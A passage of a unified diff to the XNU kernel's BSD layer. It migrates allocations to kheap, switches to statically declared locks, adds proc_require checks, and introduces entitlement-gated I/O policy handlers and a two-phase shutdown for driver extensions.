Z_WAITOK); if (!namestring) { oldlen = 0; goto err; @@ -1775,7 +1933,7 @@ sysctl(proc_t p, struct sysctl_args *uap, __unused int32_t *retval) error = userland_sysctl(FALSE, namestring, namestringlen, name, uap->namelen, &req, &oldlen); - FREE(namestring, M_TEMP); + kheap_free(KHEAP_TEMP, namestring, namestringlen); if ((error) && (error != ENOMEM)) { return error; @@ -1813,14 +1971,14 @@ sys_sysctlbyname(proc_t p, struct sysctlbyname_args *uap, __unused int32_t *retv } namelen = (size_t)uap->namelen; - MALLOC(name, char *, namelen + 1, M_TEMP, M_WAITOK); + name = kheap_alloc(KHEAP_TEMP, namelen + 1, Z_WAITOK); if (!name) { return ENOMEM; } error = copyin(uap->name, name, namelen); if (error) { - FREE(name, M_TEMP); + kheap_free(KHEAP_TEMP, name, namelen + 1); return error; } name[namelen] = '\0'; @@ -1830,7 +1988,7 @@ sys_sysctlbyname(proc_t p, struct sysctlbyname_args *uap, __unused int32_t *retv */ if (uap->newlen > SIZE_T_MAX) { - FREE(name, M_TEMP); + kheap_free(KHEAP_TEMP, name, namelen + 1); return EINVAL; } newlen = (size_t)uap->newlen; @@ -1852,7 +2010,7 @@ sys_sysctlbyname(proc_t p, struct sysctlbyname_args *uap, __unused int32_t *retv error = userland_sysctl(TRUE, name, namelen + 1, oid, CTL_MAXNAME, &req, &oldlen); - FREE(name, M_TEMP); + kheap_free(KHEAP_TEMP, name, namelen + 1); if ((error) && (error != ENOMEM)) { return error; @@ -1946,3 +2104,44 @@ kernel_sysctlbyname(const char *name, void *oldp, size_t *oldlenp, void *newp, s } return error; } + +int +scalable_counter_sysctl_handler SYSCTL_HANDLER_ARGS +{ +#pragma unused(arg2, oidp) + scalable_counter_t counter = *(scalable_counter_t*) arg1; + uint64_t value = counter_load(&counter); + return SYSCTL_OUT(req, &value, sizeof(value)); +} + +#define X(name, T) \ +int \ +experiment_factor_##name##_handler SYSCTL_HANDLER_ARGS \ +{ \ + int error, changed = 0; \ + T *ptr; \ + T new_value, current_value; \ + struct experiment_spec *spec = (struct experiment_spec *) arg1; \ + if (!arg1) { \ + return EINVAL; \ + } \ + ptr = (T *)(spec->ptr); \ + current_value = *ptr; \ + error = sysctl_io_number(req, current_value, sizeof(T), &new_value, &changed); \ + if (error != 0) { \ + return error; \ + } \ + if (changed) { \ + if (new_value < (T) spec->min_value || new_value > (T) spec->max_value) { \ + return EINVAL; \ + } \ + if (os_atomic_cmpxchg(&spec->modified, false, true, acq_rel)) { \ + spec->original_value = current_value; \ + } \ + os_atomic_store_wide(ptr, new_value, relaxed); \ + } \ + return 0; \ +} + +experiment_factor_numeric_types +#undef X diff --git a/bsd/kern/kern_ntptime.c b/bsd/kern/kern_ntptime.c index 0ae62258f..cbabd104b 100644 --- a/bsd/kern/kern_ntptime.c +++ b/bsd/kern/kern_ntptime.c @@ -187,20 +187,18 @@ static l_fp time_freq; static int64_t time_adjtime; static int updated; -static lck_spin_t * ntp_lock; -static lck_grp_t * ntp_lock_grp; -static lck_attr_t * ntp_lock_attr; -static lck_grp_attr_t *ntp_lock_grp_attr; +static LCK_GRP_DECLARE(ntp_lock_grp, "ntp_lock"); +static LCK_SPIN_DECLARE(ntp_lock, &ntp_lock_grp); #define NTP_LOCK(enable) \ enable = ml_set_interrupts_enabled(FALSE); \ - lck_spin_lock(ntp_lock); + lck_spin_lock(&ntp_lock); #define NTP_UNLOCK(enable) \ - lck_spin_unlock(ntp_lock);\ + lck_spin_unlock(&ntp_lock);\ ml_set_interrupts_enabled(enable); -#define NTP_ASSERT_LOCKED() LCK_SPIN_ASSERT(ntp_lock, LCK_ASSERT_OWNED) +#define NTP_ASSERT_LOCKED() LCK_SPIN_ASSERT(&ntp_lock, LCK_ASSERT_OWNED) static timer_call_data_t ntp_loop_update; static uint64_t ntp_loop_deadline; @@ -831,17 +829,5 @@ init_ntp_loop(void) void ntp_init(void) { - L_CLR(time_offset); - L_CLR(time_freq); - - ntp_lock_grp_attr = lck_grp_attr_alloc_init(); - ntp_lock_grp = lck_grp_alloc_init("ntp_lock", ntp_lock_grp_attr); - ntp_lock_attr = lck_attr_alloc_init(); - ntp_lock = lck_spin_alloc_init(ntp_lock_grp, ntp_lock_attr); - - updated = 0; - init_ntp_loop(); } - -SYSINIT(ntpclocks, SI_SUB_CLOCKS, SI_ORDER_MIDDLE, ntp_init, NULL); diff --git a/bsd/kern/kern_overrides.c b/bsd/kern/kern_overrides.c index 695d335b7..ca29c9079 100644 --- a/bsd/kern/kern_overrides.c +++ b/bsd/kern/kern_overrides.c @@ -51,10 +51,8 @@ #include /* Mutex for global system override state */ -static lck_mtx_t sys_override_lock; -static lck_grp_t *sys_override_mtx_grp; -static lck_attr_t *sys_override_mtx_attr; -static lck_grp_attr_t *sys_override_mtx_grp_attr; +static LCK_GRP_DECLARE(sys_override_mtx_grp, "system_override"); +static LCK_MTX_DECLARE(sys_override_lock, &sys_override_mtx_grp); /* * Assertion counts for system properties (add new ones for each new mechanism) @@ -87,9 +85,6 @@ static int64_t fast_jetsam_assert_cnt; /* Wait Channel for system override */ static uint64_t sys_override_wait; -/* Global variable to indicate if system_override is enabled */ -int sys_override_enabled; - /* Helper routines */ static void system_override_begin(uint64_t flags); static void system_override_end(uint64_t flags); @@ -97,17 +92,6 @@ static void system_override_abort(uint64_t flags); static void system_override_callouts(uint64_t flags, boolean_t enable_override); static __attribute__((noinline)) int PROCESS_OVERRIDING_SYSTEM_DEFAULTS(uint64_t timeout); -void -init_system_override() -{ - sys_override_mtx_grp_attr = lck_grp_attr_alloc_init(); - sys_override_mtx_grp = lck_grp_alloc_init("system_override", sys_override_mtx_grp_attr); - sys_override_mtx_attr = lck_attr_alloc_init(); - lck_mtx_init(&sys_override_lock, sys_override_mtx_grp, sys_override_mtx_attr); - io_throttle_assert_cnt = cpu_throttle_assert_cnt = fast_jetsam_assert_cnt = 0; - sys_override_enabled = 1; -} - /* system call implementation */ int system_override(__unused struct proc *p, struct system_override_args * uap, __unused int32_t *retval) @@ -127,12 +111,6 @@ system_override(__unused struct proc *p, struct system_override_args * uap, __un goto out; } - /* Make sure that the system override syscall has been initialized */ - if (!sys_override_enabled) { - error = EINVAL; - goto out; - } - lck_mtx_lock(&sys_override_lock); if (flags & SYS_OVERRIDE_DISABLE) { diff --git a/bsd/kern/kern_persona.c b/bsd/kern/kern_persona.c index b3470216a..31561cf42 100644 --- a/bsd/kern/kern_persona.c +++ b/bsd/kern/kern_persona.c @@ -998,8 +998,7 @@ persona_proc_adopt(proc_t p, struct persona *persona, kauth_cred_t auth_override /* Only Multiuser Mode needs to update the session login name to the persona name */ #if (TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) - volatile uint32_t *multiuser_flag_address = (volatile uint32_t *)(uintptr_t)(_COMM_PAGE_MULTIUSER_CONFIG); - uint32_t multiuser_flags = *multiuser_flag_address; + uint32_t multiuser_flags = COMM_PAGE_READ(uint32_t, MULTIUSER_CONFIG); /* set the login name of the session */ if (multiuser_flags) { struct session * sessp = proc_session(p); diff --git a/bsd/kern/kern_proc.c b/bsd/kern/kern_proc.c index 21fa06635..163122f54 100644 --- a/bsd/kern/kern_proc.c +++ b/bsd/kern/kern_proc.c @@ -190,10 +190,17 @@ __XNU_PRIVATE_EXTERN char corefilename[MAXPATHLEN + 1] = {"/private/var/cores/%N #include #endif +static LCK_MTX_DECLARE_ATTR(proc_klist_mlock, &proc_mlock_grp, &proc_lck_attr); + ZONE_DECLARE(pgrp_zone, "pgrp", sizeof(struct pgrp), ZC_ZFREE_CLEARMEM); ZONE_DECLARE(session_zone, "session", sizeof(struct session), ZC_ZFREE_CLEARMEM); +/* + * If you need accounting for KM_PROC consider using + * ZONE_VIEW_DEFINE to define a zone view. + */ +#define KM_PROC KHEAP_DEFAULT typedef uint64_t unaligned_u64 __attribute__((aligned(1))); @@ -282,7 +289,7 @@ again: LIST_REMOVE(uip, ui_hash); retval = 0; proc_list_unlock(); - FREE(uip, M_PROC); + kheap_free(KM_PROC, uip, sizeof(struct uidinfo)); goto out; } if (diff <= 0) { @@ -304,15 +311,13 @@ again: goto out; } proc_list_unlock(); - MALLOC(newuip, struct uidinfo *, sizeof(*uip), M_PROC, M_WAITOK); + newuip = kheap_alloc(KM_PROC, sizeof(struct uidinfo), Z_WAITOK); if (newuip == NULL) { panic("chgproccnt: M_PROC zone depleted"); } goto again; out: - if (newuip != NULL) { - FREE(newuip, M_PROC); - } + kheap_free(KM_PROC, newuip, sizeof(struct uidinfo)); return retval; } @@ -596,7 +601,7 @@ retry: (((p->p_listflag & (P_LIST_DRAIN | P_LIST_DRAINWAIT)) == 0) || ((p->p_listflag & P_LIST_REFWAIT) != 0))) { if ((p->p_listflag & P_LIST_REFWAIT) != 0 && uthread_needs_to_wait_in_proc_refwait()) { - msleep(&p->p_listflag, proc_list_mlock, 0, "proc_refwait", 0); + msleep(&p->p_listflag, &proc_list_mlock, 0, "proc_refwait", 0); /* * the proc might have been recycled since we dropped * the proc list lock, get the proc again. @@ -648,7 +653,7 @@ again: /* If someone else is controlling the (unreaped) zombie - wait */ if ((p->p_listflag & P_LIST_WAITING) != 0) { - (void)msleep(&p->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0); + (void)msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0); goto again; } p->p_listflag |= P_LIST_WAITING; @@ -699,7 +704,7 @@ proc_refdrain_with_refwait(proc_t p, boolean_t get_ref_and_allow_wait) /* Do not wait in ref drain for launchd exec */ while (p->p_refcount && !initexec) { p->p_listflag |= P_LIST_DRAINWAIT; - msleep(&p->p_refcount, proc_list_mlock, 0, "proc_refdrain", 0); + msleep(&p->p_refcount, &proc_list_mlock, 0, "proc_refdrain", 0); } p->p_listflag &= ~P_LIST_DRAIN; @@ -746,7 +751,7 @@ loop: if ((pp->p_listflag & (P_LIST_CHILDDRSTART | P_LIST_CHILDDRAINED)) == P_LIST_CHILDDRSTART) { pp->p_listflag |= P_LIST_CHILDDRWAIT; - msleep(&pp->p_childrencnt, proc_list_mlock, 0, "proc_parent", 0); + msleep(&pp->p_childrencnt, &proc_list_mlock, 0, "proc_parent", 0); loopcnt++; if (loopcnt == 5) { parent = PROC_NULL; @@ -800,7 +805,7 @@ proc_childdrainstart(proc_t p) /* wait for all that hold parentrefs to drop */ while (p->p_parentref > 0) { p->p_listflag |= P_LIST_PARENTREFWAIT; - msleep(&p->p_parentref, proc_list_mlock, 0, "proc_childdrainstart", 0); + msleep(&p->p_parentref, &proc_list_mlock, 0, "proc_childdrainstart", 0); } } @@ -857,6 +862,7 @@ int proc_pid(proc_t p) { if (p != NULL) { + proc_require(p, PROC_REQUIRE_ALLOW_KERNPROC); return p->p_pid; } return -1; @@ -866,6 +872,7 @@ int proc_ppid(proc_t p) { if (p != NULL) { + proc_require(p, PROC_REQUIRE_ALLOW_KERNPROC); return p->p_ppid; } return -1; @@ -875,6 +882,7 @@ int proc_original_ppid(proc_t p) { if (p != NULL) { + proc_require(p, PROC_REQUIRE_ALLOW_KERNPROC); return p->p_original_ppid; } return -1; @@ -913,6 +921,7 @@ int proc_csflags(proc_t p, uint64_t *flags) { if (p && flags) { + proc_require(p, PROC_REQUIRE_ALLOW_KERNPROC); *flags = (uint64_t)p->p_csflags; return 0; } @@ -996,7 +1005,7 @@ loop: parent = proc_ref_locked(pp); if ((parent == PROC_NULL) && (pp != PROC_NULL) && (pp->p_stat != SZOMB) && ((pp->p_listflag & P_LIST_EXITED) != 0) && ((pp->p_listflag & P_LIST_CHILDDRAINED) == 0)) { pp->p_listflag |= P_LIST_CHILDLKWAIT; - msleep(&pp->p_childrencnt, proc_list_mlock, 0, "proc_parent", 0); + msleep(&pp->p_childrencnt, &proc_list_mlock, 0, "proc_parent", 0); goto loop; } proc_list_unlock(); @@ -1745,7 +1754,7 @@ enterpgrp(proc_t p, pid_t pgid, int mksess) sess->s_count = 1; sess->s_ttypgrpid = NO_PID; - lck_mtx_init(&sess->s_mlock, proc_mlock_grp, proc_lck_attr); + lck_mtx_init(&sess->s_mlock, &proc_mlock_grp, &proc_lck_attr); bcopy(procsp->s_login, sess->s_login, sizeof(sess->s_login)); @@ -1773,7 +1782,7 @@ enterpgrp(proc_t p, pid_t pgid, int mksess) } pgrp->pg_id = pgid; - lck_mtx_init(&pgrp->pg_mlock, proc_mlock_grp, proc_lck_attr); + lck_mtx_init(&pgrp->pg_mlock, &proc_mlock_grp, &proc_lck_attr); LIST_INIT(&pgrp->pg_members); proc_list_lock(); @@ -1897,13 +1906,13 @@ pgdelete_dropref(struct pgrp *pgrp) panic("pg_deleteref: freeing session in use"); } proc_list_unlock(); - lck_mtx_destroy(&sessp->s_mlock, proc_mlock_grp); + lck_mtx_destroy(&sessp->s_mlock, &proc_mlock_grp); zfree(session_zone, sessp); } else { proc_list_unlock(); } - lck_mtx_destroy(&pgrp->pg_mlock, proc_mlock_grp); + lck_mtx_destroy(&pgrp->pg_mlock, &proc_mlock_grp); zfree(pgrp_zone, pgrp); } @@ -2232,6 +2241,18 @@ proc_ignores_content_protection(proc_t p) return os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_IGNORE_CONTENT_PROTECTION; } +bool +proc_ignores_node_permissions(proc_t p) +{ + return os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS; +} + +bool +proc_skip_mtime_update(proc_t p) +{ + return os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_SKIP_MTIME_UPDATE; +} + #if CONFIG_COREDUMP /* * proc_core_name(name, uid, pid) @@ -2764,7 +2785,7 @@ proc_iterate( proc_list_lock(); pid_count_available = nprocs + 1; /* kernel_task not counted in nprocs */ assert(pid_count_available > 0); - if (pidlist_nalloc(pl) > pid_count_available) { + if (pidlist_nalloc(pl) >= pid_count_available) { break; } proc_list_unlock(); @@ -2927,7 +2948,7 @@ proc_childrenwalk( proc_list_unlock(); goto out; } - if (pidlist_nalloc(pl) > pid_count_available) { + if (pidlist_nalloc(pl) >= pid_count_available) { break; } proc_list_unlock(); @@ -3008,7 +3029,7 @@ pgrp_iterate( } goto out; } - if (pidlist_nalloc(pl) > pid_count_available) { + if (pidlist_nalloc(pl) >= pid_count_available) { break; } pgrp_unlock(pgrp); @@ -3166,7 +3187,7 @@ pgrp_replace(struct proc * p, struct pgrp * newpg) while ((p->p_listflag & P_LIST_PGRPTRANS) == P_LIST_PGRPTRANS) { p->p_listflag |= P_LIST_PGRPTRWAIT; - (void)msleep(&p->p_pgrpid, proc_list_mlock, 0, "proc_pgrp", 0); + (void)msleep(&p->p_pgrpid, &proc_list_mlock, 0, "proc_pgrp", 0); } p->p_listflag |= P_LIST_PGRPTRANS; @@ -3276,7 +3297,7 @@ proc_pgrp(proc_t p) while ((p->p_listflag & P_LIST_PGRPTRANS) == P_LIST_PGRPTRANS) { p->p_listflag |= P_LIST_PGRPTRWAIT; - (void)msleep(&p->p_pgrpid, proc_list_mlock, 0, "proc_pgrp", 0); + (void)msleep(&p->p_pgrpid, &proc_list_mlock, 0, "proc_pgrp", 0); } pgrp = p->p_pgrp; @@ -3328,7 +3349,7 @@ proc_session(proc_t p) /* wait during transitions */ while ((p->p_listflag & P_LIST_PGRPTRANS) == P_LIST_PGRPTRANS) { p->p_listflag |= P_LIST_PGRPTRWAIT; - (void)msleep(&p->p_pgrpid, proc_list_mlock, 0, "proc_pgrp", 0); + (void)msleep(&p->p_pgrpid, &proc_list_mlock, 0, "proc_pgrp", 0); } if ((p->p_pgrp != PGRP_NULL) && ((sess = p->p_pgrp->pg_session) != SESSION_NULL)) { @@ -3356,7 +3377,7 @@ session_rele(struct session *sess) panic("session_rele: freeing session in use"); } proc_list_unlock(); - lck_mtx_destroy(&sess->s_mlock, proc_mlock_grp); + lck_mtx_destroy(&sess->s_mlock, &proc_mlock_grp); zfree(session_zone, sess); } else { proc_list_unlock(); @@ -3451,13 +3472,13 @@ proc_transwait(proc_t p, int locked) void proc_klist_lock(void) { - lck_mtx_lock(proc_klist_mlock); + lck_mtx_lock(&proc_klist_mlock); } void proc_klist_unlock(void) { - lck_mtx_unlock(proc_klist_mlock); + lck_mtx_unlock(&proc_klist_mlock); } void diff --git a/bsd/kern/kern_prot.c b/bsd/kern/kern_prot.c index d689b70d5..6a0b8edee 100644 --- a/bsd/kern/kern_prot.c +++ b/bsd/kern/kern_prot.c @@ -119,14 +119,10 @@ * result. * * Note: Does *NOT* currently include per-thread credential changes - * - * We don't use kauth_cred_print() in current debugging, but it - * can be used if needed when debugging is active. */ #if DEBUG_CRED #define DEBUG_CRED_ENTER printf #define DEBUG_CRED_CHANGE printf -extern void kauth_cred_print(kauth_cred_t cred); #else /* !DEBUG_CRED */ #define DEBUG_CRED_ENTER(fmt, ...) do {} while (0) #define DEBUG_CRED_CHANGE(fmt, ...) do {} while (0) diff --git a/bsd/kern/kern_resource.c b/bsd/kern/kern_resource.c index 662846584..65c6d020c 100644 --- a/bsd/kern/kern_resource.c +++ b/bsd/kern/kern_resource.c @@ -1614,6 +1614,10 @@ static int iopolicysys_vfs_trigger_resolve(struct proc *p, int cmd, int scope, int policy, struct _iopol_param_t *iop_param); static int iopolicysys_vfs_ignore_content_protection(struct proc *p, int cmd, int scope, int policy, struct _iopol_param_t *iop_param); +static int +iopolicysys_vfs_ignore_node_permissions(struct proc *p, int cmd, int scope, int policy, struct _iopol_param_t *ipo_param); +static int +iopolicysys_vfs_skip_mtime_update(struct proc *p, int cmd, int scope, int policy, struct _iopol_param_t *iop_param); /* * iopolicysys @@ -1684,6 +1688,18 @@ iopolicysys(struct proc *p, struct iopolicysys_args *uap, int32_t *retval) goto out; } break; + case IOPOL_TYPE_VFS_IGNORE_PERMISSIONS: + error = iopolicysys_vfs_ignore_node_permissions(p, uap->cmd, iop_param.iop_scope, iop_param.iop_policy, &iop_param); + if (error) { + goto out; + } + break; + case IOPOL_TYPE_VFS_SKIP_MTIME_UPDATE: + error = iopolicysys_vfs_skip_mtime_update(p, uap->cmd, iop_param.iop_scope, iop_param.iop_policy, &iop_param); + if (error) { + goto out; + } + break; default: error = EINVAL; goto out; @@ -2289,6 +2305,104 @@ out: return error; } +#define AUTHORIZED_ACCESS_ENTITLEMENT \ + "com.apple.private.vfs.authorized-access" +int +iopolicysys_vfs_ignore_node_permissions(struct proc *p, int cmd, int scope, + int policy, __unused struct _iopol_param_t *iop_param) +{ + int error = EINVAL; + + switch (scope) { + case IOPOL_SCOPE_PROCESS: + break; + default: + goto out; + } + + switch (cmd) { + case IOPOL_CMD_GET: + policy = os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS ? + IOPOL_VFS_IGNORE_PERMISSIONS_ON : IOPOL_VFS_IGNORE_PERMISSIONS_OFF; + iop_param->iop_policy = policy; + goto out_ok; + case IOPOL_CMD_SET: + /* SET is handled after the switch */ + break; + default: + goto out; + } + + if (!IOTaskHasEntitlement(current_task(), AUTHORIZED_ACCESS_ENTITLEMENT)) { + error = EPERM; + goto out; + } + + switch (policy) { + case IOPOL_VFS_IGNORE_PERMISSIONS_OFF: + os_atomic_andnot(&p->p_vfs_iopolicy, P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS, relaxed); + break; + case IOPOL_VFS_IGNORE_PERMISSIONS_ON: + os_atomic_or(&p->p_vfs_iopolicy, P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS, relaxed); + break; + default: + break; + } + +out_ok: + error = 0; +out: + return error; +} + +#define SKIP_MTIME_UPDATE_ENTITLEMENT \ + "com.apple.private.vfs.skip-mtime-updates" +int +iopolicysys_vfs_skip_mtime_update(struct proc *p, int cmd, int scope, + int policy, __unused struct _iopol_param_t *iop_param) +{ + int error = EINVAL; + + switch (scope) { + case IOPOL_SCOPE_PROCESS: + break; + default: + goto out; + } + + switch (cmd) { + case IOPOL_CMD_GET: + policy = os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_SKIP_MTIME_UPDATE ? + IOPOL_VFS_SKIP_MTIME_UPDATE_ON : IOPOL_VFS_SKIP_MTIME_UPDATE_OFF; + iop_param->iop_policy = policy; + goto out_ok; + case IOPOL_CMD_SET: + break; + default: + break; + } + + if (!IOTaskHasEntitlement(current_task(), SKIP_MTIME_UPDATE_ENTITLEMENT)) { + error = EPERM; + goto out; + } + + switch (policy) { + case IOPOL_VFS_SKIP_MTIME_UPDATE_OFF: + os_atomic_andnot(&p->p_vfs_iopolicy, P_VFS_IOPOLICY_SKIP_MTIME_UPDATE, relaxed); + break; + case IOPOL_VFS_SKIP_MTIME_UPDATE_ON: + os_atomic_or(&p->p_vfs_iopolicy, P_VFS_IOPOLICY_SKIP_MTIME_UPDATE, relaxed); + break; + default: + break; + } + +out_ok: + error = 0; +out: + return error; +} /* BSD call back function for task_policy networking changes */ void proc_apply_task_networkbg(void * bsd_info, thread_t thread) diff --git a/bsd/kern/kern_shutdown.c b/bsd/kern/kern_shutdown.c index 3bd774db5..e723f89a2 100644 --- a/bsd/kern/kern_shutdown.c +++ b/bsd/kern/kern_shutdown.c @@ -67,6 +67,7 @@ #include /* for delay_for_interval() */ #include #include +#include #include @@ -82,7 +83,7 @@ unsigned int proc_shutdown_exitcount = 0; static int sd_openlog(vfs_context_t); static int sd_closelog(vfs_context_t); static void sd_log(vfs_context_t, const char *, ...); -static void proc_shutdown(void); +static void proc_shutdown(int only_non_dext); static void zprint_panic_info(void); extern void halt_log_enter(const char * what, const void * pc, uint64_t time); @@ -93,6 +94,7 @@ extern boolean_t kdp_has_polled_corefile(void); struct sd_filterargs { int delayterm; int shutdownstate; + int only_non_dext; }; @@ -113,7 +115,7 @@ static int sd_callback1(proc_t p, void * arg); static int sd_callback2(proc_t p, void * arg); static int sd_callback3(proc_t p, void * arg); -extern boolean_t panic_include_zprint; +extern bool panic_include_zprint; extern mach_memory_info_t *panic_kext_memory_info; extern vm_size_t panic_kext_memory_size; @@ -217,7 +219,7 @@ reboot_kernel(int howto, char *message) /* handle live procs (deallocate their root and current directories), suspend initproc */ startTime = mach_absolute_time(); - proc_shutdown(); + proc_shutdown(TRUE); halt_log_enter("proc_shutdown", 0, mach_absolute_time() - startTime); #if CONFIG_AUDIT @@ -252,10 +254,27 @@ reboot_kernel(int howto, char *message) #endif /* DEVELOPMENT || DEBUG */ { startTime = mach_absolute_time(); - vfs_unmountall(); + vfs_unmountall(TRUE); halt_log_enter("vfs_unmountall", 0, mach_absolute_time() - startTime); } + IOSystemShutdownNotification(kIOSystemShutdownNotificationTerminateDEXTs); + + startTime = mach_absolute_time(); + proc_shutdown(FALSE); + halt_log_enter("proc_shutdown", 0, mach_absolute_time() - startTime); + +#if DEVELOPMENT || DEBUG + if (!(howto & RB_PANIC) || !kdp_has_polled_corefile()) +#endif /* DEVELOPMENT || DEBUG */ + { + startTime = mach_absolute_time(); + vfs_unmountall(FALSE); + halt_log_enter("vfs_unmountall", 0, mach_absolute_time() - startTime); + } + + + /* Wait for the buffer cache to clean remaining dirty buffers */ startTime = mach_absolute_time(); for (iter = 0; iter < 100; iter++) { @@ -334,6 +353,7 @@ sd_closelog(vfs_context_t ctx) if (sd_logvp != NULLVP) { VNOP_FSYNC(sd_logvp, MNT_WAIT, ctx); error = vnode_close(sd_logvp, FWRITE, ctx); + sd_logvp = NULLVP; } return error; @@ -365,6 +385,8 @@ sd_log(vfs_context_t ctx, const char *fmt, ...) va_end(arglist); } +#define proc_is_driver(p) (task_is_driver((p)->task)) + static int sd_filt1(proc_t p, void * args) { @@ -373,6 +395,10 @@ sd_filt1(proc_t p, void * args) int delayterm = sf->delayterm; int shutdownstate = sf->shutdownstate; + if (sf->only_non_dext && proc_is_driver(p)) { + return 0; + } + if (((p->p_flag & P_SYSTEM) != 0) || (p->p_ppid == 0) || (p == self) || (p->p_stat == SZOMB) || (p->p_shutdownstate != shutdownstate) @@ -403,7 +429,9 @@ sd_callback1(proc_t p, void * args) proc_shutdown_exitcount++; proc_list_unlock(); } - + if (proc_is_driver(p)) { + printf("lingering dext %s signal(%d)\n", p->p_name, signo); + } psignal(p, signo); if (countproc != 0) { sd->activecount++; @@ -423,6 +451,10 @@ sd_filt2(proc_t p, void * args) int delayterm = sf->delayterm; int shutdownstate = sf->shutdownstate; + if (sf->only_non_dext && proc_is_driver(p)) { + return 0; + } + if (((p->p_flag & P_SYSTEM) != 0) || (p->p_ppid == 0) || (p == self) || (p->p_stat == SZOMB) || (p->p_shutdownstate == shutdownstate) @@ -451,6 +483,9 @@ sd_callback2(proc_t p, void * args) proc_shutdown_exitcount++; proc_list_unlock(); } + if (proc_is_driver(p)) { + printf("lingering dext %s signal(%d)\n", p->p_name, signo); + } psignal(p, signo); if (countproc != 0) { sd->activecount++; @@ -517,7 +552,7 @@ sd_callback3(proc_t p, void * args) */ static void -proc_shutdown(void) +proc_shutdown(int only_non_dext) { vfs_context_t ctx = vfs_context_current(); struct proc *p, *self; @@ -550,6 +585,7 @@ sigterm_loop: */ sfargs.delayterm = delayterm; sfargs.shutdownstate = 0; + sfargs.only_non_dext = only_non_dext; sdargs.signo = SIGTERM; sdargs.setsdstate = 1; sdargs.countproc = 1; @@ -569,7 +605,7 @@ sigterm_loop: */ ts.tv_sec = 3; ts.tv_nsec = 0; - error = msleep(&proc_shutdown_exitcount, proc_list_mlock, PWAIT, "shutdownwait", &ts); + error = msleep(&proc_shutdown_exitcount, &proc_list_mlock, PWAIT, "shutdownwait", &ts); if (error != 0) { for (p = allproc.lh_first; p; p = p->p_list.le_next) { if ((p->p_listflag & P_LIST_EXITCOUNT) == P_LIST_EXITCOUNT) { @@ -628,7 +664,7 @@ sigterm_loop: */ ts.tv_sec = 10; ts.tv_nsec = 0; - error = msleep(&proc_shutdown_exitcount, proc_list_mlock, PWAIT, "shutdownwait", &ts); + error = msleep(&proc_shutdown_exitcount, &proc_list_mlock, PWAIT, "shutdownwait", &ts); if (error != 0) { for (p = allproc.lh_first; p; p = p->p_list.le_next) { if ((p->p_listflag & P_LIST_EXITCOUNT) == P_LIST_EXITCOUNT) { @@ -686,6 +722,10 @@ sigterm_loop: sd_closelog(ctx); + if (only_non_dext) { + return; + } + /* * Now that all other processes have been terminated, suspend init */ diff --git a/bsd/kern/kern_sig.c b/bsd/kern/kern_sig.c index 3c9cb1fee..74ecaf338 100644 --- a/bsd/kern/kern_sig.c +++ b/bsd/kern/kern_sig.c @@ -3252,7 +3252,6 @@ postsig_locked(int signum) * Default catcher, where the default is to kill * the process. (Other cases were ignored above.) */ - sig_lock_to_exit(p); /* * exit_with_reason() below will consume a reference to the thread's exit reason, so we take another diff --git a/bsd/kern/kern_sysctl.c b/bsd/kern/kern_sysctl.c index 4c07b8ce9..153407899 100644 --- a/bsd/kern/kern_sysctl.c +++ b/bsd/kern/kern_sysctl.c @@ -105,6 +105,7 @@ #include #include #include +#include #include #include @@ -189,6 +190,7 @@ extern unsigned int speculative_prefetch_max_iosize; extern unsigned int preheat_max_bytes; extern unsigned int preheat_min_bytes; extern long numvnodes; +extern long freevnodes; extern long num_recycledvnodes; extern uuid_string_t bootsessionuuid_string; @@ -449,6 +451,7 @@ sysctl_sched_stats(__unused struct sysctl_oid *oidp, __unused void *arg1, __unus host_basic_info_data_t hinfo; kern_return_t kret; uint32_t size; + uint32_t buf_size = 0; int changed; mach_msg_type_number_t count = HOST_BASIC_INFO_COUNT; struct _processor_statistics_np *buf; @@ -465,7 +468,8 @@ sysctl_sched_stats(__unused struct sysctl_oid *oidp, __unused void *arg1, __unus return EINVAL; } - MALLOC(buf, struct _processor_statistics_np*, size, M_TEMP, M_ZERO | M_WAITOK); + buf_size = size; + buf = kheap_alloc(KHEAP_TEMP, buf_size, Z_ZERO | Z_WAITOK); kret = get_sched_statistics(buf, &size); if (kret != KERN_SUCCESS) { @@ -482,7 +486,7 @@ sysctl_sched_stats(__unused struct sysctl_oid *oidp, __unused void *arg1, __unus panic("Sched info changed?!"); } out: - FREE(buf, M_TEMP); + kheap_free(KHEAP_TEMP, buf, buf_size); return error; } @@ -531,11 +535,7 @@ sysctl_docountsyscalls SYSCTL_HANDLER_ARGS __unused int cmd = oidp->oid_arg2; /* subcommand*/ __unused int *name = arg1; /* oid element argument vector */ __unused int namelen = arg2; /* number of oid element arguments */ - user_addr_t oldp = req->oldptr; /* user buffer copy out address */ - size_t *oldlenp = &req->oldlen; /* user buffer copy out size */ - user_addr_t newp = req->newptr; /* user buffer copy in address */ - size_t newlen = req->newlen; /* user buffer copy in size */ - int error; + int error, changed; int tmp; @@ -547,16 +547,17 @@ sysctl_docountsyscalls SYSCTL_HANDLER_ARGS * for example, to dump current counts: * sysctl -w kern.count_calls=2 */ - error = sysctl_int(oldp, oldlenp, newp, newlen, &tmp); - if (error != 0) { + error = sysctl_io_number(req, do_count_syscalls, + sizeof(do_count_syscalls), &tmp, &changed); + + if (error != 0 || !changed) { return error; } if (tmp == 1) { do_count_syscalls = 1; } else if (tmp == 0 || tmp == 2 || tmp == 3) { - int i; - for (i = 0; i < nsysent; i++) { + for (int i = 0; i < nsysent; i++) { if (syscalls_log[i] != 0) { if (tmp == 2) { printf("%d calls - name %s \n", syscalls_log[i], syscallnames[i]); @@ -565,14 +566,7 @@ sysctl_docountsyscalls SYSCTL_HANDLER_ARGS } } } - if (tmp != 0) { - do_count_syscalls = 1; - } - } - - /* adjust index so we return the right required/consumed amount */ - if (!error) { - req->oldidx += req->oldlen; + do_count_syscalls = (tmp != 0); } return error; @@ -595,65 +589,6 @@ SYSCTL_PROC(_kern, KERN_COUNT_SYSCALLS, count_syscalls, 